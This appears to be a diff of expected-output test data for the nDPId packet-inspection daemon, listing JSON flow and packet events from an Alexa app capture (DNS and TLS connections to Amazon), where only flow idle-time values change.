00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1490976114879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1490976114879,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWl1AAEARM1WsECrYrBAqAVG6ADUALQ0pp4sBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="} 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114879,"flow_last_seen":1490976114879,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976114879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1490976114880,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1490976114880,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR3zxAAEARrmWsECoBrBAq2AA1UboAPYqqp4uBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAAAoABDRe6IY="} 
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1857,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976114880,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114885,"flow_last_seen":1490976114885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114885,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1490976114885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114885,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8u1JAAEAGi5ysECrYNF7ohrKgAbstn9BiAAAAAKAC\/\/81rgAAAgQFtAQCCAoA9mswAAAAAAEDAwg="} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1859,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114894,"flow_last_seen":1490976114894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1859,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1490976114894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114894,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88bJAAEAGVTysECrYNF7ohrKhAbvIHJqDAAAAAKAC\/\/\/RDQAAAgQFtAQCCAoA9msxAAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1860,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114906,"flow_last_seen":1490976114906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114906,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1860,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1490976114906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114906,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8mqJAAEAGrEysECrYNF7ohrKiAbt67fGQAAAAAKAC\/\/\/HLQAAAgQFtAQCCAoA9msyAAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114921,"flow_last_seen":1490976114921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1490976114921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114921,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87MtAAEAGWiOsECrYNF7ohrKjAbuMuIf\/AAAAAKAC\/\/8e8QAAAgQFtAQCCAoA9ms0AAAAAAEDAwg="} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114940,"flow_last_seen":1490976114940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114940,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1490976114940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114940,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8CnJAAEAGPH2sECrYNF7ohrKkAbvN5GFHAAAAAKAC\/\/8EewAAAgQFtAQCCAoA9ms1AAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1863,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1490976115060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115060,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwcUdAAOcGLrM0XuiGrBAq2AG7sqGNgYNXyByahHASH\/5IZwAAAgQFtAEDAwY="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwOTtAAOcGZr80XuiGrBAq2AG7sqDRCzchLZ\/QY3ASH\/61sgAAAgQFtAEDAwY="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwU4dAAOcGTHM0XuiGrBAq2AG7sqKEfV0Neu3xkXASH\/5t1gAAAgQFtAEDAwY="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwVCVAAOcGS9U0XuiGrBAq2AG7sqOllKPSjLiIAHASH\/5dvwAAAgQFtAEDAwY="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1868,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw30dAAOcGwLI0XuiGrBAq2AG7sqRySquQzeRhSHASH\/5u1gAAAgQFtAEDAwY="} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1490976115065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115065,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8bNAAEAGVU+sECrYNF7ohrKhAbvIHJqEjYGDWFAQAVeS2AAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1490976115065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115065,"pkt":"AMDKkaPvePiC0\/vCCABFAAAou1NAAEAGi6+sECrYNF7ohrKgAbstn9Bj0Qs3IlAQAVcAJAAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomqNAAEAGrF+sECrYNF7ohrKiAbt67fGRhH1dDlAQAVe4RwAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7MxAAEAGWjasECrYNF7ohrKjAbuMuIgApZSj01AQAVeoMAAA"} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoCnNAAEAGPJCsECrYNF7ohrKkAbvN5GFIckqrkVAQAVe5RwAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114894,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114885,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114906,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114921,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114940,"flow_last_seen":1490976115067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115067,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1879,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114894,"flow_last_seen":1490976115189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
-01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114906,"flow_last_seen":1490976115200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1883,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114885,"flow_last_seen":1490976115200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114921,"flow_last_seen":1490976115200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114940,"flow_last_seen":1490976115201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115201,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114885,"flow_last_seen":1490976114885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114885,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1490976114885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114885,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8u1JAAEAGi5ysECrYNF7ohrKgAbstn9BiAAAAAKAC\/\/81rgAAAgQFtAQCCAoA9mswAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1859,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114894,"flow_last_seen":1490976114894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1859,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1490976114894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114894,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88bJAAEAGVTysECrYNF7ohrKhAbvIHJqDAAAAAKAC\/\/\/RDQAAAgQFtAQCCAoA9msxAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1860,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114906,"flow_last_seen":1490976114906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114906,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1860,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1490976114906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114906,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8mqJAAEAGrEysECrYNF7ohrKiAbt67fGQAAAAAKAC\/\/\/HLQAAAgQFtAQCCAoA9msyAAAAAAEDAwg="} 
